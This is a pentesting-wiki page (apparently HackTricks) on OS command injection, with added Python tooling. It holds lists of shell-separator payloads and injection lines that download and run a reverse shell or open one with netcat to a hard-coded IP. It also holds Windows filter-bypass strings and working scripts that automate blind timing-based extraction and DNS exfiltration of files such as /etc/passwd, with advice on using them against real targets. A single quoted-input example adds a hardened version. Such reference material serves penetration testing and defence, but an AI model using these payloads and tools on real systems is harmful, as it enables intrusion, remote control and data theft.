hacktricks/pentesting-web/command-injection.md
2023-08-03 19:12:22 +00:00


Command Injection

☁️ HackTricks Cloud ☁️ - 🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get access today:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

What is command injection?

OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all of its data. (Definition taken from the PortSwigger article linked in the references.)

Context

Depending on where your input is injected, you may need to terminate the quoted context (with `"` or `'`) before the commands. If the input lands inside a quoted string, a bare `;` or `|` is just part of that string; it only becomes a command separator once the surrounding quote has been closed.
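To make the quoted-context point concrete, here is an added example (not code from the original page): a constructed "ping" endpoint that embeds the user-supplied host inside a double-quoted shell string, the payload that stays trapped in the string beside the one that closes the quote first, and a hardened version that validates the host and passes argv without a shell. `printf` stands in for `ping` so it runs offline; the `INJECTED` marker and the validation regex are this example's own.

```python
import ipaddress
import re
import subprocess

# Constructed example: a "ping" endpoint that builds
#   sh -c 'printf "target=%s\n" "<host>"'
# so the attacker's input sits inside double quotes. printf stands in for ping.

HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def run_quoted_context(host: str) -> str:
    """Vulnerable: host is concatenated into a double-quoted shell string."""
    cmd = 'printf "target=%s\\n" "' + host + '"'
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


def injected(output: str) -> bool:
    """True only if `echo INJECTED` ran as its own command: then INJECTED is a
    line by itself instead of being part of the printf text."""
    return "INJECTED" in output.splitlines()


def is_valid_host(host: str) -> bool:
    """Allowlist: an IP literal or a syntactically valid hostname, nothing else."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return HOSTNAME_RE.fullmatch(host) is not None


def run_hardened(host: str) -> str:
    """Hardened: validate first, then hand argv straight to the binary with no
    shell in between, so separators and quotes have no meaning."""
    if not is_valid_host(host):
        raise ValueError("invalid host")
    return subprocess.run(["printf", "target=%s\n", host],
                          capture_output=True, text=True).stdout


def hardened_rejects(host: str) -> bool:
    """Helper for checking that the hardened path refuses a payload."""
    try:
        run_hardened(host)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    # The bare ';' stays inside the quotes; closing the quote first breaks out.
    for payload in ("127.0.0.1; echo INJECTED", '127.0.0.1"; echo INJECTED #'):
        print(repr(payload), "->", "injected" if injected(run_quoted_context(payload)) else "no effect")
```

The trailing `#` in the working payload comments out the closing `"` that the application appends, which is what keeps the resulting command line syntactically valid.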

Command Injection/Execution

```bash
# Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id   # Execute 2nd only if the 1st fails (useful when your input already broke the original command)
ls|id; ls |id; ls| id; ls | id       # Execute both (stdout of the 1st is piped into the 2nd)
ls&&id; ls &&id; ls&& id; ls && id   # Execute 2nd only if the 1st finishes OK
ls&id; ls &id; ls& id; ls & id       # Execute both (on Unix the 1st is backgrounded, so usually only the 2nd's output is returned)
ls %0A id                            # %0A is a URL-encoded newline: execute both (RECOMMENDED)

# Only Unix supported
`ls`                                 # `` command substitution
$(ls)                                # $() command substitution
ls; id                               # ; chain commands
ls${LS_COLORS:10:1}${IFS}id          # bash substring of LS_COLORS (usually ';') and $IFS (whitespace) as separators when ';' and spaces are filtered

# Not executed, but may be interesting
> /var/www/html/out.txt              # Try to redirect the output to a file (e.g. in the webroot, then fetch it)
< /etc/passwd                        # Try to feed a file to the command's stdin
```

Bypassing restrictions

If you want to execute arbitrary commands on a Linux machine, you will be interested in these bypasses:

{% content-ref url="../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md" %} bypass-bash-restrictions.md {% endcontent-ref %}

Examples

```bash
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.txt %0a php /tmp/reverse.php   # download and run a PHP reverse shell
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80                                               # reverse shell (nc -e is not available in every nc build)
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay   # PAYLOAD is a base64-encoded binary
```

Parameters

These are the top 25 parameters that could be vulnerable to code injection and similar RCE vulnerabilities (from link):

```
?cmd={payload}
?exec={payload}
?command={payload}
?execute={payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}
```

Time-based data exfiltration

Extracting data char by char:

```bash
$ time if [ $(id | grep -c "root") -eq 1 ]; then sleep 5; fi
```

The injected `if` compares a property of the command output (here: whether `id` mentions `root`, or below, one character of `whoami`) against a guess and sleeps only on a match. `time` on the demo box stands in for the HTTP response time you would measure against the target. By iterating the guess over a character set and the position over the output length, the attacker recovers the whole output of the injected command even when none of it is reflected in the response. The technique works wherever the response time can be observed, at the cost of one request per candidate character, so it is slow but it is what makes fully blind injection exploitable. Note that `==` inside `[ ]` is a bashism; use `=` if the target runs `sh`.

```bash
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys     0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys     0m0.000s
```
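The loop that turns the single check above into a full extraction, as an added example (not code from the original page): the `oracle` callable abstracts "send one input, measure how long the response takes", and in a real engagement it would wrap an HTTP request. The local oracle, the `echo Pinging` prefix and the secret `s3cr3t` are constructed stand-ins for a vulnerable host; `cut -c` and `sleep` are the same primitives the page uses.

```python
import string
import subprocess
import time
import urllib.parse
from typing import Callable

# Constructed example: automated character-by-character timing extraction.
# oracle(input) -> seconds; here it is backed by a local sh instead of HTTP.

CHARSET = string.ascii_lowercase + string.digits


def build_payload(cmd: str, position: int, candidate: str, delay: float) -> str:
    """Newline separator, then sleep only when character <position> (1-based,
    like cut -c) of cmd's output equals candidate. Uses POSIX '=' not '=='."""
    return (f'\nif [ "$({cmd} | cut -c {position})" = "{candidate}" ]; '
            f'then sleep {delay}; fi')


def url_encode(user_input: str) -> str:
    """Form for a query string: the newline becomes %0A as in the examples above."""
    return urllib.parse.quote(user_input, safe="")


def make_local_oracle(prefix: str = "echo Pinging ") -> Callable[[str], float]:
    """Constructed vulnerable endpoint: concatenates the input into a shell
    command and reports the elapsed seconds, as a response-time probe would."""
    def oracle(user_input: str) -> float:
        start = time.monotonic()
        subprocess.run(["sh", "-c", prefix + user_input],
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        return time.monotonic() - start
    return oracle


def extract(oracle: Callable[[str], float], cmd: str, charset: str = CHARSET,
            delay: float = 0.3, max_len: int = 64) -> str:
    """Recover cmd's output from timing alone, one character per position."""
    threshold = delay / 2   # a fired sleep always adds >= delay; jitter rarely reaches half of it
    found = ""
    for position in range(1, max_len + 1):
        for candidate in charset:
            elapsed = oracle("127.0.0.1" + build_payload(cmd, position, candidate, delay))
            if elapsed >= threshold:
                found += candidate
                break
        else:
            break   # no candidate matched: end of output, or a character outside charset
    return found


if __name__ == "__main__":
    print(extract(make_local_oracle(), "echo s3cr3t"))
```

Against a real target, replace `make_local_oracle` with a function that sends `url_encode(user_input)` in the vulnerable parameter and returns the request's round-trip time; keep `delay` well above the observed baseline latency, and repeat a probe before trusting a single slow response.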

DNS-based data exfiltration

Based on the tool at https://github.com/HoLyVieR/dnsbin, also hosted at dnsbin.zhack.ca.

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'

```bash
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
# Variant: turn a command's output into a single label (spaces and commas replaced, dots removed) and look it up
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
```

Online tools to check for DNS-based data exfiltration:

  • dnsbin.zhack.ca
  • pingb.in
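The `host "$i.<id>.d.zhack.ca"` loop only works for output that is already a valid DNS label, which is why the `wget -h` variant has to rewrite spaces, commas and dots. Here is an added example (not code from the original page) that hex-encodes arbitrary command output into numbered labels within the RFC 1035 limits, plus the collector-side decoder and an injectable POSIX `sh` one-liner that does the same encoding with `od`/`tr`/`fold`. The suffix `abc.example.com` and the `printf` commands in the usage are constructed placeholders for your dnsbin domain and the command you want to exfiltrate.

```python
import binascii
import subprocess

# Constructed example: hex-encode output into DNS queries and decode them again.
# Hex survives case folding by resolvers and never produces an invalid label.

LABEL_MAX = 63   # RFC 1035: a label is at most 63 octets
NAME_MAX = 253   # practical maximum for a full name in text form


def encode_names(data: bytes, suffix: str) -> list[str]:
    """Split hex(data) into queries of the form "<seq>.<hexchunk>.<suffix>"."""
    hexed = binascii.hexlify(data).decode()
    names, seq, pos = [], 0, 0
    while pos < len(hexed):
        # room left for the data label once "<seq>." and ".<suffix>" are in place
        room = NAME_MAX - len(str(seq)) - 2 - len(suffix)
        if room < 2:
            raise ValueError("suffix too long to carry data")
        step = min(LABEL_MAX, room)
        names.append(f"{seq}.{hexed[pos:pos + step]}.{suffix}")
        seq += 1
        pos += step
    return names


def decode_names(names: list[str], suffix: str) -> bytes:
    """Reassemble from the collector log: tolerates reordering, duplicate
    queries from resolver retries, case folding and unrelated names."""
    chunks = {}
    tail = "." + suffix.lower()
    for name in names:
        name = name.strip().lower().rstrip(".")
        if not name.endswith(tail):
            continue
        labels = name[:-len(tail)].split(".")
        chunks.setdefault(int(labels[0]), "".join(labels[1:]))
    return binascii.unhexlify("".join(chunks[k] for k in sorted(chunks)))


def shell_one_liner(cmd: str, suffix: str, sink: str = "host", width: int = 60) -> str:
    """Injectable POSIX-sh loop: od/tr/fold hex-encode cmd's output into
    numbered labels; `sink` is the command that triggers the lookup."""
    return (f'n=0; for c in $({cmd} | od -An -v -tx1 | tr -d " \\n" | fold -w {width}); '
            f'do {sink} "$n.$c.{suffix}"; n=$((n+1)); done')


def run_locally(cmd: str, suffix: str) -> bytes:
    """Offline check: run the loop with echo as the sink and decode the names
    that would have been queried."""
    out = subprocess.run(["sh", "-c", shell_one_liner(cmd, suffix, sink="echo")],
                         capture_output=True, text=True, check=True).stdout
    return decode_names(out.splitlines(), suffix)


if __name__ == "__main__":
    print(shell_one_liner("cat /etc/passwd", "abc.example.com"))
    print(run_locally("printf s3cr3t", "abc.example.com"))
```

`od -v` matters: without it `od` collapses repeated lines into `*` and the decoded output silently loses bytes. Hex doubles the size of the data; base32 is denser and also case-safe, but needs a tool on the target that is less commonly present than `od`.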

Filter bypass

Windows

```bash
powershell C:**2\n??e*d.*?          # notepad: wildcards expand to C:\Windows\System32\notepad.exe
@^p^o^w^e^r^shell c:**32\c*?c.e?e   # calc: cmd.exe ignores the ^ escape character, so the keyword survives a string filter
```

Linux

{% content-ref url="../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md" %} bypass-bash-restrictions.md {% endcontent-ref %}

Brute-force detection list

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt" %}

References

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection" %}

{% embed url="https://portswigger.net/web-security/os-command-injection" %}
